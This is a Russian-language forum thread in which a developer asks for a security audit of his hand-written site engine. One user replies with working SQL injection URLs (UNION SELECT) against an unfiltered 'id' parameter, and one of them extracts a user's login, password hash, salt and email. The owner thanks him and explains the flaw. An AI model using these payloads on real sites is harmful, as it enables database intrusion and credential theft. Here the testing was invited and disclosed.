Аудит сайта.

kingbeef · 26.08.2012, 10:05

Самописный движок

http://vrn1.ru
100% движка(кроме поддоменов) написаны с нуля, просьба проверить на возможнгые уязвимости

BigBear · 27.08.2012, 12:54

Ну вот как то так...

Нефильтруемая переменная id

Inject

Код:

http://vrn1.ru/index.php?act=attach&type=post&id=-99+union+all+select+user()--

Response

Код:

vrn1_user@localhosto

Ну и понеслось...

Код:

http://vrn1.ru/index.php?act=attach&type=post&id=-99+union+all+select+(select+concat(0x27,0x7e,unhex(Hex(cast(users.id+as+char))),0x5e,unhex(Hex(cast(users.login+as+char))),0x5e,unhex(Hex(cast(users.pass+as+char))),0x5e,unhex(Hex(cast(users.salt+as+char))),0x5e,unhex(Hex(cast(users.email+as+char))),0x27,0x7e)+from+%60vrn1_bd%60.users+where+id=12792)+--

Response

Код:

http://vrn1.ru/img/'~12792^BigBear^cb50ba4d1184b689ceb1050e5afcedc9^?i2XF^BigBear2008@yandex.ru'~o

12792 - мой акк, чтобы никого не палить)

Mantius · 27.08.2012, 14:22

BigBear большое спасибо, что докопали так глубоко!
Это модуль совместимости со старой версией форума(была на движке ипб), там есть редиректы для тем, сообщений, профилей, разделов, поиска и, собственно, аттачей. Уязвимость была только в аттачах(допущена по невнимательности) и вы всё равно смогли найти её - браво! Это при том, что старые урлы в движке не используются(index.php вообще физически не существует на сервере) и отдельного труда стоило найти их и обратить внимание на реализованную обратную совместимость.

Если честно, поначалу не воспринял всерьёз совет kingbeef создать тему именно на этом форуме, подумав, что здесь не будет нормальных спецов, а теперь вижу, что был не прав=)

Mantius · 27.08.2012, 14:38

На vrn1.ru движок первый полностью с нуля написанный мной - его я писал и параллельно изучал необходимые языки/технологии(пхп и html немного знал, мускул, яваскрипт, jquery и css пришлось учить с нуля) в течении двух месяцев. Собственно, до сих пор он остаётся самым функциональным из всех мной написанных, потому и уязвимостей, на мой взгляд, в нём больше всего.

Mantius · 01.10.2012, 15:08

Тестирование окончено, спасибо всем участникам! Отписываться большинство не стали, но по логам я вижу, что люди активно участвовали и искали дыры - благодарность им за это.

26.08.2012, 10:05	#1
kingbeef Регистрация: 28.10.2011 Сообщений: 17 Репутация: 0	Аудит сайта. Самописный движок http://vrn1.ru 100% движка(кроме поддоменов) написаны с нуля, просьба проверить на возможнгые уязвимости

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

27.08.2012, 14:22	#3
Mantius Регистрация: 27.08.2012 Сообщений: 3 Репутация: 0	BigBear большое спасибо, что докопали так глубоко! Это модуль совместимости со старой версией форума(была на движке ипб), там есть редиректы для тем, сообщений, профилей, разделов, поиска и, собственно, аттачей. Уязвимость была только в аттачах(допущена по невнимательности) и вы всё равно смогли найти её - браво! Это при том, что старые урлы в движке не используются(index.php вообще физически не существует на сервере) и отдельного труда стоило найти их и обратить внимание на реализованную обратную совместимость. Если честно, поначалу не воспринял всерьёз совет kingbeef создать тему именно на этом форуме, подумав, что здесь не будет нормальных спецов, а теперь вижу, что был не прав=)

27.08.2012, 14:38	#4
Mantius Регистрация: 27.08.2012 Сообщений: 3 Репутация: 0	На vrn1.ru движок первый полностью с нуля написанный мной - его я писал и параллельно изучал необходимые языки/технологии(пхп и html немного знал, мускул, яваскрипт, jquery и css пришлось учить с нуля) в течении двух месяцев. Собственно, до сих пор он остаётся самым функциональным из всех мной написанных, потому и уязвимостей, на мой взгляд, в нём больше всего.

01.10.2012, 15:08	#5
Mantius Регистрация: 27.08.2012 Сообщений: 3 Репутация: 0	Тестирование окончено, спасибо всем участникам! Отписываться большинство не стали, но по логам я вижу, что люди активно участвовали и искали дыры - благодарность им за это.